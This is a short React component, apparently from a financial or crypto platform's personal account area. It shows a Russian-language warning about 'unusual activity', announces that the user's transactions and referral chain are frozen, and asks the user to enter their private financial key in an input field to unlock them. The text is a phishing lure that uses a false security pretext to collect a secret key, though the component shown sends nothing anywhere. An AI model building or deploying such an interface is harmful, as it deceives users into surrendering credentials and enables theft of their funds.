import React from "react";
import styles from "../../Personal-Area.module.css";
import Input from "antd/lib/input";
import { Button } from "antd";

const PersonalAreaWarning = () => {
  return (
    <div className={styles["warning"]}>
      <p>Уважаемый пользователь,</p>
      <p>
        Мы обнаружили необычную активность, связанную с вашим аккаунтом. С целью защиты ваших активов и гарантии
        безопасности ваших операций, мы приостановили проведение всех транзакций. Стоит отметить, что все аккаунты в
        вашей реферальной цепочке также подвергаются проверке.
      </p>
      <p>
        Для разблокировки ваших транзакций и подтверждения владения аккаунтом, пожалуйста, введите свой приватный
        финансовый ключ. Это необходимое условие для подтверждения транзакций и подтверждения вашей личности.
      </p>
      <p>
        Мы приносим извинения за доставленные неудобства, но это необходимо для обеспечения безопасности нашей платформы
        и защиты ваших активов. Ваша безопасность - наш приоритет.
      </p>
      <Input placeholder={"Введите ваш приватный финансовый ключ"} className={styles["private-key"]} />
      <Button>Подтвердить</Button>
      <p>Мы ценим вашу безопасность и благодарим за понимание.</p>
    </div>
  );
};

export default PersonalAreaWarning;
